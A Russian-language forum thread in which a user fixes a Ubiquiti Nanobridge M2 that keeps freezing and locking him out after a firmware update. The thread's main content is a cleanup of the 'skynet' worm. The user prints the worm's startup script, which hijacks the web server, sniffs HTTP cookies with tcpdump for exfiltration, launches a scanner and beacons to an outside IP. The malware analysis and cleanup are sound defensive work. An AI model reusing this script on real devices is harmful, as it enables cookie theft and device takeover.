Перейти к содержимому
Калькуляторы

Nanobridge M2 - ограниченный uptime

Уважаемые форумчане, где собака порылась?

У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания.

 

Посоветовали обновить прошивку.

Скачал прошивку. Черех вэб интерфейс начал обновлять.

Индикатор медленно дополз до середины, а потом быстро добежал до конца.

Бридж перегрузился, захожу на него снова - прошивка старая.

Запусил еще раз обновление - теперь индикатор медленно и уверенно дошел до конца

Но теперь не могу зайти на вэб интрефейс и соответственно ни к каким настройкам доступа нет.

IP адрес остался тем же, инет есть.

Что делать??? Прошу помощи!

Спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания.

Достаточно было вочдог настроить...

У Вас случайно логирование не было включено?

 

Какая прошивка стояла?

 

Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/

если там есть файлы вида rc.* то их надо удалить, после чего вести команду

cfgmtd -p /etc -w

и перегрузить

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

По https не пробовали войти ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Достаточно было вочдог настроить...

У Вас случайно логирование не было включено?

 

Перед прошивкой сделал скриншоты всех вкладок.

На вкладке Sestemlog - Enable Ping WatchDog и Enable System Log флажки сняты.

 

Какая прошивка стояла?

 

Стояла 5.3.3

Хотел поставить 5.5.3

 

Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/

если там есть файлы вида rc.* то их надо удалить, после чего вести команду

cfgmtd -p /etc -w

и перегрузить

 

Это попробую, но пока не знаю как - никогда не делал и не знаю как это делается ((

 

По https не пробовали войти ?

Попробовал - то же самое

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания.

Достаточно было вочдог настроить...

У Вас случайно логирование не было включено?

 

Какая прошивка стояла?

 

Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/

если там есть файлы вида rc.* то их надо удалить, после чего вести команду

cfgmtd -p /etc -w

и перегрузить

 

Все проделал - интерфейс запустился))

Только тот файл не стал удалять, переименовал.

Понаблюдаю теперь какой будет аптайм, может попустило.

Спасибо!

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

У Вас вирус.

Этого файла быть не должно.

Вирус мог попасть из-за старой весии прошивки, в которой была известная дыра в безопасности.

 

Чтоб такого не повторялось следует использовать спец. vlan для управления точками.

 

Сделайте

 

cat rc.остаток_имени_файла

Интересно посмотреть на код вируса.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Не знаю как сам текст скопировать ((

Пробовал выделять мышкой, а он потом как-то дублировался в окне, он хоть не выполнился?

XM.v5.5.3# ls
cardlist.txt           dropbear_rsa_host_key
dropbear_dss_host_key  rcpoststartold
XM.v5.5.3# cat rcpoststartold
#!/bin/sh
sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf
kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3`
ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"`

#sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip &

if [ -e /bin/tcpdump ]; then
tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/persistent/.skynet/tt &
/etc/persistent/.skynet/sendcook &
fi
(sleep 20 ; /etc/persistent/.skynet/scan) &
(sleep 100400 ; sleep 42 ; halt) &
XM.v5.5.3#

Изменено пользователем lvv

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Как только Вы выделили мышью -- он скопировался (и можно уже вставлять), а если нажали правой кнопкой -- вставился, ну и что-то выполнилось,но не очень страшно.

Да, это вирус skynet, правда, одной из первых версий, так что ничего особо страшного...

интересно, что за:

cardlist.txt

Его там тоже не должно быть.

 

И судя по коду там должна быть скрытая папка:

ls -a

./skynet её можно тоже удалить

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

XM.v5.5.3# ls -a
.                      cardlist.txt           dropbear_rsa_host_key
..                     dropbear_dss_host_key  rcpoststartold
XM.v5.5.3# cat cardlist.txt
#Format:
#Vendor:Product:cdma/gsm:PPP dev handle:backend dev handle:AT+CSQ:pic file name:notes:backendmode
1199:6880:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mercury_connect.gif:Sierra Wireless USB Connect Mercury:2
1199:6890:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_usb888.gif:Sierra Wireless USB 888:3
1199:0025:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_598U.gif:Sierra Wireless 598U:1
1199:68a3:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_lightning_usb305.gif:Sierra Wireless Lightning USB 305:3
1199:683c:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mc8790.gif:Sierra MC8790 HSPA Module:3
1410:6000:cdma:/dev/ttyUSB0::AT+CSQ:3g_novatel_usb760.png:Novatel U760:0
1004:6141:gsm:/dev/ttyACM0:/dev/ttyACM1:AT+CSQ:3g_lg_usbconnect_turbo.gif:LGE USB Connect Turbo:3
1199:0024:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1
1199:0224:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1
1199:0028:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5728.gif:Sierra MC5728:1

#unverified that anything is on ttyUSB1
0af0:7a05:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_option_usbconnect_velocity.gif:Option USB Connect Velocity:0
12d1:1464:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_vodafone_huawei.gif:Vodafone Mobile Broadband (Huawei):3
19d2:0015:gsm:/dev/ttyUSB0:/dev/ttyUSB2:AT+CSQ:3g_zte_mf628.gif:ZTE MF628:3
19d2:0016:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3
19d2:0063:gsm:/dev/ttyUSB3:/dev/ttyUSB1:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3
19d2:0104:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k4505_z.gif:Vodafone ZTE K4505-Z:3
12d1:140c:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_huawei_E173.gif:Huawei E173:3
XM.v5.5.3#

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Фигя какая-то, ну и фиг с ней, рекомендую, кста, перегрузить ещё раз, сменить пароль(т.к. вирус мог его стырить) и перегрузить повторно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

NewUse

Ура - все заработало как надо! Проблема решена (удалил лишние файлы)!!!

Спасибо большое!!!

Изменено пользователем lvv

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 смайлов.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.